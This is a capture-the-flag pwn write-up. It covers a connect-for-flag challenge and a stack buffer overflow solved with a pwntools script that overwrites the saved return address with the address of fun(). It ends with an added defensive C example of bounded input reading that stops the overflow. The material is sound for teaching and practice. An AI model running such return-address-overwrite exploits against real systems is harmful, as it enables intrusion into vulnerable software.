PWN
1. A PWN challenge that gives the flag on connect
Connect with nc to buuoj.cn on port 6000 to get the flag.
2. Overwriting RIP
Analysis in IDA shows that the binary already contains a call to system, so it is enough to overwrite RIP with the address of fun(). peda gives the offset as 23, so the script is:
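from pwn import *

# Connect to the remote challenge service
sh = remote('f.buuoj.cn', 6001)
# 23 bytes of padding reach the saved return address, which is overwritten with fun() at 0x401186
payload = b'a' * 23 + p64(0x401186)
sh.sendline(payload)
sh.interactive()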
This gets the flag.
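
The overwrite is possible only because the target accepts more input than its stack buffer holds. The following is an added example, not code from the writeup or from the challenge binary: a bounded line reader in C that stores at most what fits and discards the rest. The 15-byte buffer size is an assumption (offset 23 = 15 + 8 bytes of saved RBP), and the function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 15  /* assumed: offset 23 = 15-byte buffer + 8-byte saved RBP */

/* Read one line into dst (cap bytes including the NUL terminator).
 * Returns bytes stored, or -1 if nothing could be read. *truncated is set
 * when the line did not fit; the excess is drained, never stored. */
int read_line_bounded(FILE *in, char *dst, size_t cap, int *truncated)
{
    int c;
    size_t len;

    *truncated = 0;
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {       /* whole line fit */
        dst[len - 1] = '\0';
        return (int)(len - 1);
    }
    while ((c = fgetc(in)) != EOF && c != '\n')  /* discard the overflow */
        *truncated = 1;
    return (int)len;
}

/* Feed constructed bytes through the bounded reader via a temp file. */
int read_from_bytes(const unsigned char *data, size_t n, char *dst, int *truncated)
{
    FILE *f = tmpfile();
    int r;

    if (f == NULL) return -1;
    fwrite(data, 1, n, f);
    rewind(f);
    r = read_line_bounded(f, dst, BUF_SIZE, truncated);
    fclose(f);
    return r;
}

int main(void)
{
    unsigned char in[32];   /* constructed: same layout as the script's input */
    char buf[BUF_SIZE];
    int truncated, n;

    memset(in, 'a', 23);                                     /* padding */
    memcpy(in + 23, "\x86\x11\x40\x00\x00\x00\x00\x00", 8);  /* 8 address bytes */
    in[31] = '\n';
    n = read_from_bytes(in, sizeof in, buf, &truncated);
    printf("stored=%d truncated=%d\n", n, truncated);
    return truncated ? 0 : 1;
}
```

With this reader the 32-byte input is cut to 14 stored bytes and flagged as truncated, so nothing reaches the saved return address.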